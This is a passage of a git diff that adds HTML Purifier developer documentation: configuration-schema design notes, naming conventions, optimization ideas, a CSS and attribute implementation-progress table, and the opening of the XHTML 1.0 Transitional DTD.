parameters, +like: + +VERSION: 3.0.0 +ALLOWED: 'none', 'light', 'medium', 'heavy' // this is wrapped in array() +EXTERNAL: CSSTidy // this would be documented somewhere else with a URL + +The final loss would be that you wouldn't know what file the directive +was used in; with some clever regexps it should be possible to +figure out where $config->get($ns, $d); occurs. Reflective calls to +the configuration object is mitigated by the fact that getBatch is +used, so we can simply talk about that in the namespace definition page. +This might be slow, but it would only happen when we are creating +the documentation for consumption, and is sugar. + +We can put this in a schema/ directory, outside of HTML Purifier. The serialized +data gets treated like entities.ser. + +The final thing that needs to be handled is user defined configurations. +They can be added at runtime using ConfigSchema::registerDirectory() +which globs the directory and grabs all of the directives to be incorporated +in. Then, the result is saved. We may want to take advantage of the +DefinitionCache framework, although it is not altogether certain what +configuration directives would be used to generate our key (meta-directives!) + + Further thoughts + ---------------- + Our master configuration schema will only need to be updated once + every new version, so it's easily versionable. User specified + schema files are far more volatile, but it's far too expensive + to check the filemtimes of all the files, so a DefinitionRev style + mechanism works better. However, we can uniquely identify the + schema based on the directories they loaded, so there's no need + for a DefinitionId until we give them full programmatic control. + + These variables should be directly incorporated into ConfigSchema, + and ConfigSchema should handle serialization. Some refactoring will be + necessary for the DefinitionCache classes, as they are built with + Config in mind. If the user changes something, the cache file gets + rebuilt. If the version changes, the cache file gets rebuilt. Since + our unit tests flush the caches before we start, and the operation is + pretty fast, this will not negatively impact unit testing. + +One last thing: certain configuration directives require that files +get added. They may even be specified dynamically. It is not a good idea +for the HTMLPurifier_Config object to be used directly for such matters. +Instead, the userland code should explicitly perform the includes. We may +put in something like: + +REQUIRES: HTMLPurifier_Filter_ExtractStyleBlocks + +To indicate that if that class doesn't exist, and the user is attempting +to use the directive, we should fatally error out. The stub includes the core files, +and the user includes everything else. Any reflective things like new +$class would be required to tie in with the configuration. + +It would work very well with rarely used configuration options, but it +wouldn't be so good for "core" parts that can be disabled. In such cases +the core include file would need to be modified, and the only way +to properly do this is use the configuration object. Once again, our +ability to create cache keys saves the day again: we can create arbitrary +stub files for arbitrary configurations and include those. They could +even be the single file affairs. The only thing we'd need to include, +then, would be HTMLPurifier_Config! Then, the configuration object would +load the library. + + An aside... + ----------- + One questions, however, the wisdom of letting PHP files write other PHP + files. It seems like a recipe for disaster, or at least lots of headaches + in highly secured setups, where PHP does not have the ability to write + to its root. In such cases, we could use sticky bits or tell the user + to manually generate the file. + + The other troublesome bit is actually doing the calculations necessary. + For certain cases, it's simple (such as URIScheme), but for AttrDef + and HTMLModule the dependency trees are very complex in relation to + %HTML.Allowed and friends. I think that this idea should be shelved + and looked at a later, less insane date. + +An interesting dilemma presents itself when a configuration form is offered +to the user. Normally, the configuration object is not accessible without +editing PHP code; this facility changes thing. The sensible thing to do +is stipulate that all classes required by the directives you allow must +be included. + +Unit testing +------------ + +Setting up the parsing and translation into our existing format would not +be difficult to do. It might represent a good time for us to rethink our +tests for these facilities; as creative as they are, they are often hacky +and require public visibility for things that ought to be protected. +This is especially applicable for our DefinitionCache tests. + +Migration +--------- + +Because we are not *adding* anything essentially new, it should be trivial +to write a script to take our existing data and dump it into the new format. +Well, not trivial, but fairly easy to accomplish. Primary implementation +difficulties would probably involve formatting the file nicely. + +Backwards-compatibility +----------------------- + +I expect that the ConfigSchema methods should stick around for a little bit, +but display E_USER_NOTICE warnings that they are deprecated. This will +require documentation! + +New stuff +--------- + +VERSION: Version number directive was introduced +DEPRECATED-VERSION: If the directive was deprecated, when was it deprecated? +DEPRECATED-USE: If the directive was deprecated, what should the user use now? +REQUIRES: What classes does this configuration directive require, but are + not part of the HTML Purifier core? + + vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/docs/dev-naming.html b/lib/htmlpurifier/docs/dev-naming.html new file mode 100644 index 000000000..cea4b006f --- /dev/null +++ b/lib/htmlpurifier/docs/dev-naming.html @@ -0,0 +1,83 @@ +<?xml version="1.0" encoding="UTF-8"?> +<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" + "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> +<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> +<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> +<meta name="description" content="Defines class naming conventions in HTML Purifier." /> +<link rel="stylesheet" type="text/css" href="./style.css" /> + +<title>Naming Conventions - HTML Purifier</title> + +</head><body> + +<h1>Naming Conventions</h1> + +<div id="filing">Filed under Development</div> +<div id="index">Return to the <a href="index.html">index</a>.</div> +<div id="home"><a href="http://htmlpurifier.org/">HTML Purifier</a> End-User Documentation</div> + +<p>The classes in this library follow a few naming conventions, which may +help you find the correct functionality more quickly. Here they are:</p> + +<dl> + +<dt>All classes occupy the HTMLPurifier pseudo-namespace.</dt> + <dd>This means that all classes are prefixed with HTMLPurifier_. As such, all + names under HTMLPurifier_ are reserved. I recommend that you use the name + HTMLPurifierX_YourName_ClassName, especially if you want to take advantage + of HTMLPurifier_ConfigDef.</dd> + +<dt>All classes correspond to their path if library/ was in the include path</dt> + <dd>HTMLPurifier_AttrDef is located at HTMLPurifier/AttrDef.php; replace + underscores with slashes and append .php and you'll have the location of + the class.</dd> + +<dt>Harness and Test are reserved class names for unit tests</dt> + <dd>The suffix <code>Test</code> indicates that the class is a subclass of UnitTestCase + (of the Simpletest library) and is testable. "Harness" indicates a subclass + of UnitTestCase that is not meant to be run but to be extended into + concrete test cases and contains custom test methods (i.e. assert*())</dd> + +<dt>Class names do not necessarily represent inheritance hierarchies</dt> + <dd>While we try to reflect inheritance in naming to some extent, it is not + guaranteed (for instance, none of the classes inherit from HTMLPurifier, + the base class). However, all class files have the require_once + declarations to whichever classes they are tightly coupled to.</dd> + +<dt>Strategy has a meaning different from the Gang of Four pattern</dt> + <dd>In Design Patterns, the Gang of Four describes a Strategy object as + encapsulating an algorithm so that they can be switched at run-time. While + our strategies are indeed algorithms, they are not meant to be substituted: + all must be present in order for proper functioning.</dd> + +<dt>Abbreviations are avoided</dt> + <dd>We try to avoid abbreviations as much as possible, but in some cases, + abbreviated version is more readable than the full version. Here, we + list common abbreviations: + <ul> + <li>Attr to Attributes (note that it is plural, i.e. <code>$attr = array()</code>)</li> + <li>Def to Definition</li> + <li><code>$ret</code> is the value to be returned in a function</li> + </ul> + </dd> + +<dt>Ambiguity concerning the definition of Def/Definition</dt> + <dd>While a definition normally defines the structure/acceptable values of + an entity, most of the definitions in this application also attempt + to validate and fix the value. I am unsure of a better name, as + "Validator" would exclude fixing the value, "Fixer" doesn't invoke + the proper image of "fixing" something, and "ValidatorFixer" is too long! + Some other suggestions were "Handler", "Reference", "Check", "Fix", + "Repair" and "Heal".</dd> + +<dt>Transform not Transformer</dt> + <dd>Transform is both a noun and a verb, and thus we define a "Transform" as + something that "transforms," leaving "Transformer" (which sounds like an + electrical device/robot toy).</dd> + +</dl> + +</body></html> + +<!-- vim: et sw=4 sts=4 +--> diff --git a/lib/htmlpurifier/docs/dev-optimization.html b/lib/htmlpurifier/docs/dev-optimization.html new file mode 100644 index 000000000..78f565813 --- /dev/null +++ b/lib/htmlpurifier/docs/dev-optimization.html @@ -0,0 +1,33 @@ +<?xml version="1.0" encoding="UTF-8"?> +<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" + "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> +<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> +<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> +<meta name="description" content="Discusses possible methods of optimizing HTML Purifier." /> +<link rel="stylesheet" type="text/css" href="./style.css" /> + +<title>Optimization - HTML Purifier</title> + +</head><body> + +<h1>Optimization</h1> + +<div id="filing">Filed under Development</div> +<div id="index">Return to the <a href="index.html">index</a>.</div> +<div id="home"><a href="http://htmlpurifier.org/">HTML Purifier</a> End-User Documentation</div> + +<p>Here are some possible optimization techniques we can apply to code sections if +they turn out to be slow. Be sure not to prematurely optimize: if you get +that itch, put it here!</p> + +<ul> + <li>Make Tokens Flyweights (may prove problematic, probably not worth it)</li> + <li>Rewrite regexps into PHP code</li> + <li>Batch regexp validation (do as many per function call as possible)</li> + <li>Parallelize strategies</li> +</ul> + +</body></html> + +<!-- vim: et sw=4 sts=4 +--> diff --git a/lib/htmlpurifier/docs/dev-progress.html b/lib/htmlpurifier/docs/dev-progress.html new file mode 100644 index 000000000..105896ed6 --- /dev/null +++ b/lib/htmlpurifier/docs/dev-progress.html @@ -0,0 +1,309 @@ +<?xml version="1.0" encoding="UTF-8"?> +<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" + "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> +<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> +<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> +<meta name="description" content="Tables detailing HTML element and CSS property implementation coverage in HTML Purifier." /> +<link rel="stylesheet" type="text/css" href="./style.css" /> + +<title>Implementation Progress - HTML Purifier</title> + +<style type="text/css"> + +td {padding-right:1em;border-bottom:1px solid #000;padding-left:0.5em;} +th {text-align:left;padding-top:1.4em;font-size:13pt; + border-bottom:2px solid #000;background:#FFF;} +thead th {text-align:left;padding:0.1em;background-color:#EEE;} + +.impl-yes {background:#9D9;} +.impl-partial {background:#FFA;} +.impl-no {background:#CCC;} + +.danger {color:#600;} +.css1 {color:#060;} +.required {font-weight:bold;} +.feature {color:#999;} + +</style> + +</head><body> + +<h1>Implementation Progress</h1> + +<div id="filing">Filed under Development</div> +<div id="index">Return to the <a href="index.html">index</a>.</div> +<div id="home"><a href="http://htmlpurifier.org/">HTML Purifier</a> End-User Documentation</div> + +<p> + <strong>Warning:</strong> This table is kept for historical purposes and + is not being actively updated. +</p> + +<h2>Key</h2> + +<table cellspacing="0"><tbody> +<tr><td class="impl-yes">Implemented</td></tr> +<tr><td class="impl-partial">Partially implemented</td></tr> +<tr><td class="impl-no">Not priority to implement</td></tr> +<tr><td class="danger">Dangerous attribute/property</td></tr> +<tr><td class="css1">Present in CSS1</td></tr> +<tr><td class="feature">Feature, requires extra work</td></tr> +</tbody></table> + +<h2>CSS</h2> + +<table cellspacing="0"> + +<thead> +<tr><th>Name</th><th>Notes</th></tr> +</thead> + +<!-- +<tr><td>-</td><td>-</td></tr> +--> + +<tbody> +<tr><th colspan="2">Standard</th></tr> +<tr class="css1 impl-yes"><td>background-color</td><td>COMPOSITE(<color>, transparent)</td></tr> +<tr class="css1 impl-yes"><td>background</td><td>SHORTHAND, currently alias for background-color</td></tr> +<tr class="css1 impl-yes"><td>border</td><td>SHORTHAND, MULTIPLE</td></tr> +<tr class="css1 impl-yes"><td>border-color</td><td>MULTIPLE</td></tr> +<tr class="css1 impl-yes"><td>border-style</td><td>MULTIPLE</td></tr> +<tr class="css1 impl-yes"><td>border-width</td><td>MULTIPLE</td></tr> +<tr class="css1 impl-yes"><td>border-*</td><td>SHORTHAND</td></tr> +<tr class="impl-yes"><td>border-*-color</td><td>COMPOSITE(<color>, transparent)</td></tr> +<tr class="impl-yes"><td>border-*-style</td><td>ENUM(none, hidden, dotted, dashed, + solid, double, groove, ridge, inset, outset)</td></tr> +<tr class="css1 impl-yes"><td>border-*-width</td><td>COMPOSITE(<length>, thin, medium, thick)</td></tr> +<tr class="css1 impl-yes"><td>clear</td><td>ENUM(none, left, right, both)</td></tr> +<tr class="css1 impl-yes"><td>color</td><td><color></td></tr> +<tr class="css1 impl-yes"><td>float</td><td>ENUM(left, right, none), May require layout + precautions with clear</td></tr> +<tr class="css1 impl-yes"><td>font</td><td>SHORTHAND</td></tr> +<tr class="css1 impl-yes"><td>font-family</td><td>CSS validator may complain if fallback font + family not specified</td></tr> +<tr class="css1 impl-yes"><td>font-size</td><td>COMPOSITE(<absolute-size>, + <relative-size>, <length>, <percentage>)</td></tr> +<tr class="css1 impl-yes"><td>font-style</td><td>ENUM(normal, italic, oblique)</td></tr> +<tr class="css1 impl-yes"><td>font-variant</td><td>ENUM(normal, small-caps)</td></tr> +<tr class="css1 impl-yes"><td>font-weight</td><td>ENUM(normal, bold, bolder, lighter, + 100, 200, 300, 400, 500, 600, 700, 800, 900), maybe special code for + in-between integers</td></tr> +<tr class="css1 impl-yes"><td>letter-spacing</td><td>COMPOSITE(<length>, normal)</td></tr> +<tr class="css1 impl-yes"><td>line-height</td><td>COMPOSITE(<number>, + <length>, <percentage>, normal)</td></tr> +<tr class="css1 impl-yes"><td>list-style-position</td><td>ENUM(inside, outside), + Strange behavior in browsers</td></tr> +<tr class="css1 impl-yes"><td>list-style-type</td><td>ENUM(...), + Well-supported values are: disc, circle, square, + decimal, lower-roman, upper-roman, lower-alpha and upper-alpha. See also + CSS 3. Mostly IE lack of support.</td></tr> +<tr class="css1 impl-yes"><td>list-style</td><td>SHORTHAND</td></tr> +<tr class="css1 impl-yes"><td>margin</td><td>MULTIPLE</td></tr> +<tr class="css1 impl-yes"><td>margin-*</td><td>COMPOSITE(<length>, + <percentage>, auto)</td></tr> +<tr class="css1 impl-yes"><td>padding</td><td>MULTIPLE</td></tr> +<tr class="css1 impl-yes"><td>padding-*</td><td>COMPOSITE(<length>(positive), + <percentage>(positive))</td></tr> +<tr class="css1 impl-yes"><td>text-align</td><td>ENUM(left, right, + center, justify)</td></tr> +<tr class="css1 impl-yes"><td>text-decoration</td><td>No blink (argh my eyes), not + enum, can be combined (composite sorta): underline, overline, + line-through</td></tr> +<tr class="css1 impl-yes"><td>text-indent</td><td>COMPOSITE(<length>, + <percentage>)</td></tr> +<tr class="css1 impl-yes"><td>text-transform</td><td>ENUM(capitalize, uppercase, + lowercase, none)</td></tr> +<tr class="css1 impl-yes"><td>width</td><td>COMPOSITE(<length>, + <percentage>, auto), Interesting</td></tr> +<tr class="css1 impl-yes"><td>word-spacing</td><td>COMPOSITE(<length>, auto), + IE 5 no support</td></tr> +</tbody> + +<tbody> +<tr><th colspan="2">Table</th></tr> +<tr class="impl-yes"><td>border-collapse</td><td>ENUM(collapse, seperate)</td></tr> +<tr class="impl-yes"><td>border-space</td><td>MULTIPLE</td></tr> +<tr class="impl-yes"><td>caption-side</td><td>ENUM(top, bottom)</td></tr> +<tr class="feature"><td>empty-cells</td><td>ENUM(show, hide), No IE support makes this useless, + possible fix with &nbsp;? Unknown release milestone.</td></tr> +<tr class="impl-yes"><td>table-layout</td><td>ENUM(auto, fixed)</td></tr> +<tr class="impl-yes css1"><td>vertical-align</td><td>COMPOSITE(ENUM(baseline, sub, + super, top, text-top, middle, bottom, text-bottom), <percentage>, + <length>) Also applies to others with explicit height</td></tr> +</tbody> + +<tbody> +<tr><th colspan="2">Absolute positioning, unknown release milestone</th></tr> +<tr class="danger impl-no"><td>bottom</td><td rowspan="4">Dangerous, must be non-negative to even be considered, + but it's still possible to arbitrarily position by running over.</td></tr> +<tr class="danger impl-no"><td>left</td></tr> +<tr class="danger impl-no"><td>right</td></tr> +<tr class="danger impl-no"><td>top</td></tr> +<tr class="impl-no"><td>clip</td><td>-</td></tr> +<tr class="danger impl-no"><td>position</td><td>ENUM(static, relative, absolute, fixed) + relative not absolute?</td></tr> +<tr class="danger impl-no"><td>z-index</td><td>Dangerous</td></tr> +</tbody> + +<tbody> +<tr><th colspan="2">Unknown</th></tr> +<tr class="danger css1 impl-yes"><td>background-image</td><td>Dangerous</td></tr> +<tr class="css1 impl-yes"><td>background-attachment</td><td>ENUM(scroll, fixed), + Depends on background-image</td></tr> +<tr class="css1 impl-yes"><td>background-position</td><td>Depends on background-image</td></tr> +<tr class="danger impl-no"><td>cursor</td><td>Dangerous but fluffy</td></tr> +<tr class="danger impl-yes"><td>display</td><td>ENUM(...), Dangerous but interesting; + will not implement list-item, run-in (Opera only) or table (no IE); + inline-block has incomplete IE6 support and requires -moz-inline-box + for Mozilla. Unknown target milestone.</td></tr> +<tr class="css1 impl-yes"><td>height</td><td>Interesting, why use it? Unknown target milestone.</td></tr> +<tr class="danger css1 impl-yes"><td>list-style-image</td><td>Dangerous?</td></tr> +<tr class="impl-no"><td>max-height</td><td rowspan="4">No IE 5/6</td></tr> +<tr class="impl-no"><td>min-height</td></tr> +<tr class="impl-no"><td>max-width</td></tr> +<tr class="impl-no"><td>min-width</td></tr> +<tr class="impl-no"><td>orphans</td><td>No IE support</td></tr> +<tr class="impl-no"><td>widows</td><td>No IE support</td></tr> +<tr><td>overflow</td><td>ENUM, IE 5/6 almost (remove visible if set). Unknown target milestone.</td></tr> +<tr><td>page-break-after</td><td>ENUM(auto, always, avoid, left, right), + IE 5.5/6 and Opera. Unknown target milestone.</td></tr> +<tr><td>page-break-before</td><td>ENUM(auto, always, avoid, left, right), + Mostly supported. Unknown target milestone.</td></tr> +<tr><td>page-break-inside</td><td>ENUM(avoid, auto), Opera only. Unknown target milestone.</td></tr> +<tr class="impl-no"><td>quotes</td><td>May be dropped from CSS2, fairly useless for inline context</td></tr> +<tr class="danger impl-yes"><td>visibility</td><td>ENUM(visible, hidden, collapse), + Dangerous</td></tr> +<tr class="css1 feature impl-partial"><td>white-space</td><td>ENUM(normal, pre, nowrap, pre-wrap, + pre-line), Spotty implementation: + pre (no IE 5/6), <em>nowrap</em> (no IE 5, supported), + pre-wrap (only Opera), pre-line (no support). Fixable? Unknown target milestone.</td></tr> +</tbody> + +<tbody class="impl-no"> +<tr><th colspan="2">Aural</th></tr> +<tr><td>azimuth</td><td>-</td></tr> +<tr><td>cue</td><td>-</td></tr> +<tr><td>cue-after</td><td>-</td></tr> +<tr><td>cue-before</td><td>-</td></tr> +<tr><td>elevation</td><td>-</td></tr> +<tr><td>pause-after</td><td>-</td></tr> +<tr><td>pause-before</td><td>-</td></tr> +<tr><td>pause</td><td>-</td></tr> +<tr><td>pitch-range</td><td>-</td></tr> +<tr><td>pitch</td><td>-</td></tr> +<tr><td>play-during</td><td>-</td></tr> +<tr><td>richness</td><td>-</td></tr> +<tr><td>speak-header</td><td>Table related</td></tr> +<tr><td>speak-numeral</td><td>-</td></tr> +<tr><td>speak-punctuation</td><td>-</td></tr> +<tr><td>speak</td><td>-</td></tr> +<tr><td>speech-rate</td><td>-</td></tr> +<tr><td>stress</td><td>-</td></tr> +<tr><td>voice-family</td><td>-</td></tr> +<tr><td>volume</td><td>-</td></tr> +</tbody> + +<tbody class="impl-no"> +<tr><th colspan="2">Will not implement</th></tr> +<tr><td>content</td><td>Not applicable for inline styles</td></tr> +<tr><td>counter-increment</td><td>Needs content, Opera only</td></tr> +<tr><td>counter-reset</td><td>Needs content, Opera only</td></tr> +<tr><td>direction</td><td>No support</td></tr> +<tr><td>outline-color</td><td rowspan="4">IE Mac and Opera on outside, +Mozilla on inside and needs -moz-outline, no IE support.</td></tr> + <tr><td>outline-style</td></tr> + <tr><td>outline-width</td></tr> + <tr><td>outline</td></tr> +<tr><td>unicode-bidi</td><td>No support</td></tr> +</tbody> + +</table> + +<h2>Interesting Attributes</h2> + +<table cellspacing="0"> + +<thead> +<tr><th>Attribute</th><th>Tags</th><th>Notes</th></tr> +</thead> + +<!-- +<tr><th></th></tr> +<tbody> +<tr><td>-</td><td>-</td><td>-</td></tr> +</tbody> +--> + +<tbody> +<tr><th colspan="3">CSS</th></tr> +<tr class="impl-yes"><td>style</td><td>All</td><td>Parser is reasonably functional. Status here doesn't count individual properties.</td></tr> +</tbody> + +<tbody> +<tr><th colspan="3">Questionable</th></tr> +<tr class="impl-no"><td>accesskey</td><td>A</td><td>May interfere with main interface</td></tr> +<tr class="impl-no"><td>tabindex</td><td>A</td><td>May interfere with main interface</td></tr> +<tr class="impl-yes"><td>target</td><td>A</td><td>Config enabled, only useful for frame layouts, disallowed in strict</td></tr> +</tbody> + +<tbody> +<tr><th colspan="3">Miscellaneous</th></tr> +<tr><td>datetime</td><td>DEL, INS</td><td>No visible effect, ISO format</td></tr> +<tr class="impl-yes"><td>rel</td><td>A</td><td>Largely user-defined: nofollow, tag (see microformats)</td></tr> +<tr class="impl-yes"><td>rev</td><td>A</td><td>Largely user-defined: vote-*</td></tr> +<tr class="feature"><td>axis</td><td>TD, TH</td><td>W3C only: No browser implementation</td></tr> +<tr class="feature"><td>char</td><td>COL, COLGROUP, TBODY, TD, TFOOT, TH, THEAD, TR</td><td>W3C only: No browser implementation</td></tr> +<tr class="feature"><td>headers</td><td>TD, TH</td><td>W3C only: No browser implementation</td></tr> +<tr class="impl-yes"><td>scope</td><td>TD, TH</td><td>W3C only: No browser implementation</td></tr> +</tbody> + +<tbody class="impl-yes"> +<tr><th colspan="3">URI</th></tr> +<tr><td rowspan="2">cite</td><td>BLOCKQUOTE, Q</td><td>For attribution</td></tr> + <tr><td>DEL, INS</td><td>Link to explanation why it changed</td></tr> +<tr><td>href</td><td>A</td><td>-</td></tr> +<tr><td>longdesc</td><td>IMG</td><td>-</td></tr> +<tr class="required"><td>src</td><td>IMG</td><td>Required</td></tr> +</tbody> + +<tbody> +<tr><th colspan="3">Transform</th></tr> +<tr class="impl-yes"><td rowspan="5">align</td><td>CAPTION</td><td>'caption-side' for top/bottom, 'text-align' for left/right</td></tr> + <tr class="impl-yes"><td>IMG</td><td rowspan="3">See specimens/html-align-to-css.html</td></tr> + <tr class="impl-yes"><td>TABLE</td></tr> + <tr class="impl-yes"><td>HR</td></tr> + <tr class="impl-yes"><td>H1, H2, H3, H4, H5, H6, P</td><td>Equivalent style 'text-align'</td></tr> +<tr class="required impl-yes"><td>alt</td><td>IMG</td><td>Required, insert image filename if src is present or default invalid image text</td></tr> +<tr class="impl-yes"><td rowspan="3">bgcolor</td><td>TABLE</td><td>Superset style 'background-color'</td></tr> + <tr class="impl-yes"><td>TR</td><td>Superset style 'background-color'</td></tr> + <tr class="impl-yes"><td>TD, TH</td><td>Superset style 'background-color'</td></tr> +<tr class="impl-yes"><td>border</td><td>IMG</td><td>Equivalent style <code>border:[number]px solid</code></td></tr> +<tr class="impl-yes"><td>clear</td><td>BR</td><td>Near-equiv style 'clear', transform 'all' into 'both'</td></tr> +<tr class="impl-no"><td>compact</td><td>DL, OL, UL</td><td>Boolean, needs custom CSS class; rarely used anyway</td></tr> +<tr class="required impl-yes"><td>dir</td><td>BDO</td><td>Required, insert ltr (or configuration value) if none</td></tr> +<tr class="impl-yes"><td>height</td><td>TD, TH</td><td>Near-equiv style 'height', needs px suffix if original was in pixels</td></tr> +<tr class="impl-yes"><td>hspace</td><td>IMG</td><td>Near-equiv styles 'margin-top' and 'margin-bottom', needs px suffix</td></tr> +<tr class="impl-yes"><td>lang</td><td>*</td><td>Copy value to xml:lang</td></tr> +<tr class="impl-yes"><td rowspan="2">name</td><td>IMG</td><td>Turn into ID</td></tr> + <tr class="impl-yes"><td>A</td><td>Turn into ID</td></tr> +<tr class="impl-yes"><td>noshade</td><td>HR</td><td>Boolean, style 'border-style:solid;'</td></tr> +<tr class="impl-yes"><td>nowrap</td><td>TD, TH</td><td>Boolean, style 'white-space:nowrap;' (not compat with IE5)</td></tr> +<tr class="impl-yes"><td>size</td><td>HR</td><td>Near-equiv 'height', needs px suffix if original was pixels</td></tr> +<tr class="required impl-yes"><td>src</td><td>IMG</td><td>Required, insert blank or default img if not set</td></tr> +<tr class="impl-yes"><td>start</td><td>OL</td><td>Poorly supported 'counter-reset', allowed in loose, dropped in strict</td></tr> +<tr class="impl-yes"><td rowspan="3">type</td><td>LI</td><td rowspan="3">Equivalent style 'list-style-type', different allowed values though. (needs testing)</td></tr> + <tr class="impl-yes"><td>OL</td></tr> + <tr class="impl-yes"><td>UL</td></tr> +<tr class="impl-yes"><td>value</td><td>LI</td><td>Poorly supported 'counter-reset', allowed in loose, dropped in strict</td></tr> +<tr class="impl-yes"><td>vspace</td><td>IMG</td><td>Near-equiv styles 'margin-left' and 'margin-right', needs px suffix, see hspace</td></tr> +<tr class="impl-yes"><td rowspan="2">width</td><td>HR</td><td rowspan="2">Near-equiv style 'width', needs px suffix if original was pixels</td></tr> + <tr class="impl-yes"><td>TD, TH</td></tr> +</tbody> + +</table> + +</body></html> + +<!-- vim: et sw=4 sts=4 +--> diff --git a/lib/htmlpurifier/docs/dtd/xhtml1-transitional.dtd b/lib/htmlpurifier/docs/dtd/xhtml1-transitional.dtd new file mode 100644 index 000000000..628f27ac5 --- /dev/null +++ b/lib/htmlpurifier/docs/dtd/xhtml1-transitional.dtd @@ -0,0 +1,1201 @@ +<!-- + Extensible HTML version 1.0 Transitional DTD + + This is the same as HTML 4 Transitional except for + changes due to the differences between XML and SGML. + + Namespace = http://www.w3.org/1999/xhtml + + For further information, see: http://www.w3.org/TR/xhtml1 + + Copyright (c) 1998-2002 W3C (MIT, INRIA, Keio), + All Rights Reserved. + + This DTD module is identified by the PUBLIC and SYSTEM identifiers: + + PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" + SYSTEM "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" + + $Revision: 1.2 $ + $Date: 2002/08/01 18:37:55 $ + +--> + +<!--================ Character mnemonic entities =========================--> + +<!ENTITY % HTMLlat1 PUBLIC + "-//W3C//ENTITIES Latin 1 for XHTML//EN" + "xhtml-lat1.ent"> +%HTMLlat1; + +<!ENTITY % HTMLsymbol PUBLIC + "-//W3C//ENTITIES Symbols for XHTML//EN" + "xhtml-symbol.ent"> +%HTMLsymbol; + +<!ENTITY % HTMLspecial PUBLIC + "-//W3C//ENTITIES Special for XHTML//EN" + "xhtml-special.ent"> +%HTMLspecial; + +<!--================== Imported Names ====================================--> + +<!ENTITY % ContentType "CDATA"> + <!-- media type, as per [RFC2045] --> + +<!ENTITY % ContentTypes "CDATA"> + <!-- comma-separated list of media types, as per [RFC2045] --> + +<!ENTITY % Charset "CDATA"> + <!-- a character encoding, as per [RFC2045] --> + +<!ENTITY % Charsets "CDATA"> + <!-- a space separated list of character encodings, as per [RFC2045] --> + +<!ENTITY % LanguageCode "NMTOKEN"> + <!-- a language code, as per [RFC3066] --> + +<!ENTITY % Character "CDATA"> + <!-- a single character, as per section 2.2 of [XML] --> + +<!ENTITY % Number "CDATA"> + <!-- one or more digits --> + +<!ENTITY % LinkTypes "CDATA"> + <!-- space-separated list of link types --> + +<!ENTITY % MediaDesc "CDATA"> + <!-- single or comma-separated list of media descriptors --> + +<!ENTITY % URI "CDATA"> + <!-- a Uniform Resource Identifier, see [RFC2396] --> + +<!ENTITY % UriList "CDATA"> + <!-- a space separated list of Uniform Resource Identifiers --> + +<!ENTITY % Datetime "CDATA"> + <!-- date and time information. ISO date format --> + +<!ENTITY % Script "CDATA"> + <!-- script expression --> + +<!ENTITY % StyleSheet "CDATA"> + <!-- style sheet data --> + +<!ENTITY % Text "CDATA"> + <!-- used for titles etc. --> + +<!ENTITY % FrameTarget "NMTOKEN"> + <!-- render in this frame --> + +<!ENTITY % Length "CDATA"> + <!-- nn for pixels or nn% for percentage length --> + +<!ENTITY % MultiLength "CDATA"> + <!-- pixel, percentage, or relative --> + +<!ENTITY % Pixels "CDATA"> + <!-- integer representing length in pixels --> + +<!-- these are used for image maps --> + +<!ENTITY % Shape "(rect|circle|poly|default)"> + +<!ENTITY % Coords "CDATA"> + <!-- comma separated list of lengths --> + +<!-- used for object, applet, img, input and iframe --> +<!ENTITY % ImgAlign "(top|middle|bottom|left|right)"> + +<!-- a color using sRGB: #RRGGBB as Hex values --> +<!ENTITY % Color "CDATA"> + +<!-- There are also 16 widely known color names with their sRGB values: + + Black = #000000 Green = #008000 + Silver = #C0C0C0 Lime = #00FF00 + Gray = #808080 Olive = #808000 + White = #FFFFFF Yellow = #FFFF00 + Maroon = #800000 Navy = #000080 + Red = #FF0000 Blue = #0000FF + Purple = #800080 Teal = #008080 + Fuchsia= #FF00FF Aqua = #00FFFF +--> + +<!--=================== Generic Attributes ===============================--> + +<!-- core attributes common to most elements + id document-wide unique id + class space separated list of classes + style associated style info + title advisory title/amplification +--> +<!ENTITY % coreattrs + "id ID #IMPLIED + class CDATA #IMPLIED + style %StyleSheet; #IMPLIED + title %Text; #IMPLIED" + > + +<!-- internationalization attributes + lang language code (backwards compatible) + xml:lang language code (as per XML 1.0 spec) + dir direction for weak/neutral text +--> +<!ENTITY % i18n + "lang %LanguageCode; #IMPLIED + xml:lang %LanguageCode; #IMPLIED + dir (ltr|rtl) #IMPLIED" + > + +<!-- attributes for common UI events + onclick a pointer button was clicked + ondblclick a pointer button was double clicked + onmousedown a pointer button was pressed down + onmouseup a pointer button was released + onmousemove a pointer was moved onto the element + onmouseout a pointer was moved away from the element + onkeypress a key was pressed and released + onkeydown a key was pressed down + onkeyup a key was released +--> +<!ENTITY % events + "onclick %Script; #IMPLIED + ondblclick %Script; #IMPLIED + onmousedown %Script; #IMPLIED + onmouseup %Script; #IMPLIED + onmouseover %Script; #IMPLIED + onmousemove %Script; #IMPLIED + onmouseout %Script; #IMPLIED + onkeypress %Script; #IMPLIED + onkeydown %Script; #IMPLIED + onkeyup %Script; #IMPLIED" + > + +<!-- attributes for elements that can get the focus + accesskey accessibility key character + tabindex position in tabbing order + onfocus the element got the focus + onblur the element lost the focus +--> +<!ENTITY % focus + "accesskey %Character; #IMPLIED + tabindex %Number; #IMPLIED + onfocus %Script; #IMPLIED + onblur %Script; #IMPLIED" + > + +<!ENTITY % attrs "%coreattrs; %i18n; %events;"> + +<!-- text alignment for p, div, h1-h6. The default is + align="left" for ltr headings, "right" for rtl --> + +<!ENTITY % TextAlign "align (left|center|right|justify) #IMPLIED"> + +<!--=================== Text Elements ====================================--> + +<!ENTITY % special.extra + "object | applet | img | map | iframe"> + +<!ENTITY % special.basic + "br | span | bdo"> + +<!ENTITY % special + "%special.basic; | %special.extra;"> + +<!ENTITY % fontstyle.extra "big | small | font | basefont"> + 